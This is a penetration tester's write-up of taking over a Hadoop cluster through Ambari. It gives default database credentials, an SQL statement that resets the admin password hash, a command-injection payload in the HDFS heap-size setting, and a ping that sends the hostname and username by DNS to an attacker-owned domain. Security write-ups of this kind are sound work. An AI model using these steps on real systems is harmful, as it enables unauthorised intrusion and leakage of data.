Something we're starting to see occasionally on penetration tests is Hadoop clusters and all of the associated technologies that go along with them.
The old security model for these things used to be "Trust your network", i.e. lock them in a room somewhere behind a firewall and cross your fingers. Nowadays, however, bleeding-edge security features such as usernames and passwords have been implemented on many of the administrative interfaces for these services *gasp*.
On a recent penetration test, Juken (http://jstnkndy.github.io/) and I ran into a semi-locked-down Hadoop cluster. The HDFS file browsing web interfaces were still enabled and didn't require authentication (e.g. http://<namenode host>:1022/browseDirectory.jsp), but we wanted shells, and lots of them.
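If all you need is anonymous filesystem browsing, that interface is easy to script against. A rough sketch - the host below is a placeholder, and the dir parameter is an assumption about how browseDirectory.jsp is typically queried:

# host is a placeholder for the real NameNode; dir param is assumed
curl "http://namenode.example.com:1022/browseDirectory.jsp?dir=/"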
So where to start? A quick port scan and httpscreenshot run showed a number of management and monitoring tools running. After some initial stumbling around and default password checking on the web interfaces, we'd come up dry. Then, in a short moment of brilliance, Juken decided to try the default DBMS credentials on the PostgreSQL database server backing the Ambari administrative tool - they worked.
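For reference, connecting looked roughly like this - a sketch assuming Ambari's commonly documented defaults of database "ambari", user "ambari", password "bigdata" (your target may differ):

# host is a placeholder; the default credentials are an assumption based on Ambari's documented defaults
psql -h ambari.example.com -U ambari -d ambari
# when prompted, try the out-of-the-box password "bigdata"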
Ambari is a provisioning tool for Hadoop clusters. With a few clicks, you can instruct it to install different packages like YARN, Hadoop, HDFS, etc. on the various nodes that it manages. Unfortunately, there is no official "feature" to send yourself a bash shell on the remote machines.
With credentials to the Postgres database, it was trivial to create a new admin user in Ambari with the password "admin". Passwords are hashed (sha256/bcrypt) with a random salt, so the easiest way is to just add a new user or modify the existing admin's password with the following:
update ambari.users set user_password='538916f8943ec225d97a9a86a2c6ec0818c1cd400e09e03b660fdaaec4af29ddbb6f2b1033b81b00' where user_name='admin'
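If you'd rather push that change from the attacking box in one shot, something like the following works (same assumed connection details as above; the hash is shortened to a placeholder standing in for the full string from the update statement):

# <hash from above> is a placeholder for the full hash string shown earlier
psql -h ambari.example.com -U ambari -d ambari -c "update ambari.users set user_password='<hash from above>' where user_name='admin';"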
Unfortunately, Ambari needs to be restarted for new users or changed passwords to take effect... so now you must wait.
Eventually the change was applied and we were in. After some time and much frustration with technology we weren't exactly familiar with, we found the undocumented "shell" feature - it's always there somewhere, you just have to look hard enough.
It turns out that for the HDFS service (and probably all the others) you can inject commands into the Java heap size parameter. The JavaScript on the front end of the app doesn't like it, but if you make the change through Burp, it will be applied and saved. Restart the service and boom goes the dynamite - your command gets executed on every namenode/datanode in the cluster.
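To give a rough idea of the payload: the tampered value ends up in a shell-sourced env file (hadoop-env.sh) on each node, so anything after a semicolon runs when the service restarts. The exact field name and templating below are assumptions on my part, but it looks roughly like this:

# value the UI sends:        1024
# value replayed via Burp:   1024; ping `hostname`.`whoami`.somedomainweown.com
# which lands in hadoop-env.sh as roughly:
export HADOOP_HEAPSIZE=1024; ping `hostname`.`whoami`.somedomainweown.com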
In the screenshot, we ran `ping \`hostname\`.\`whoami\`.somedomainweown.com` - we own the authoritative nameserver for that domain and listen on port 53. Watch the DNS requests for things like "server1.root.somedomainweown.com" roll in.
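On the nameserver side you don't even need a full resolver to catch the callbacks; a packet capture on the authoritative host is enough (interface name is a placeholder):

# watch the hostname.username lookups arrive on the authoritative nameserver
tcpdump -n -i eth0 udp port 53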